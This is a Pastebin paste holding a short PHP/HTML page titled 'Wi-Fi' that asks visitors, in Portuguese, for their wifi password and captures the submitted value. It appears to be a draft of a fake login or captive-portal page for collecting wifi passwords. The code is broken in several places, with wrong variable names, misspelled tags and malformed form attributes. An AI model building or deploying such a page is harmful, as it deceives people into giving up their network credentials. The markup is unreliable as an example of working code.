Advertisement
Guest User

Untitled

a guest
Jan 21st, 2020
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.47 KB | None | 0 0
  1. <?php
  2.  
  3. If ($POST){
  4. $senha = $POST['senha']
  5. }
  6.  
  7. ?>
  8. <!Doctype html>
  9. <html>
  10. <haed>
  11. <title> Wi-Fi </title>
  12. <meta charset="utf-8"/>
  13. </head>
  14. <body>
  15. <h1> LOGIN </h1>
  16. <p> Digite sua senha wifi</p>
  17. <!-- Script Para Senha -->
  18. <form name="cadastro" action"test.php" method"POST" accpet-charseth=utf-8">
  19. Senha: <input type="password" placeholder="**********" name="senha" maxlength="20" required>
  20. <input type="submit" value"enviar"/>
  21.  
  22. </body>
  23.  
  24. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement